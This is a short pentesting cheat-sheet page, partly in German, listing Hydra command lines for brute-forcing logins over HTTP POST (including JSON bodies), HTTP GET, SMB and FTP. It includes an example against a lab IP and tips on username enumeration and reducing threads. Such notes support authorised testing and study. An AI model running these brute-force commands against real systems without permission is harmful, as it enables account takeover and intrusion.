hydra

Hydra is a parallelized, fast and flexible login cracker.

Examples

http-post

hydra -l <USER> -P <Password> <IP Address> http-post-form '<Login Page>:<Request Body>:<Error Message>'

with json

hydra -l james -P wordlist-james.txt 10.10.177.37 http-post-form '/api/user/login:{"username"\:"^USER^","password"\:"^PASS^"}:Invalid:H=Content-Type: application/json' -V

http-get

hydra 127.0.0.1 http-form-get '/login.php?username=^USER^&password=^PASS^:Bad password'

*Bemerkung: Es ist auch möglich hydra zu verwenden um einen Loginnamen herauszufinden. Vorraussetzung ist, dass sich die Errormeldung bei dem richtigen Nutzer ändert.

smb

hydra -l user -P <PW-file> <ip> smb -V

ftp

hydra -l user -P <PW-file> <ip> ftp

false-positve

Falls es zu false-positive kommen sollte bei den http-get/post bruteforce versuchen sollte man versuchen die Anzahl threads mit z.B "-t 1" zu reduzieren.

Hydra returning incorrect passwordsInformation Security Stack Exchange

PreviousWindows NextSQL injection

Last updated 4 years ago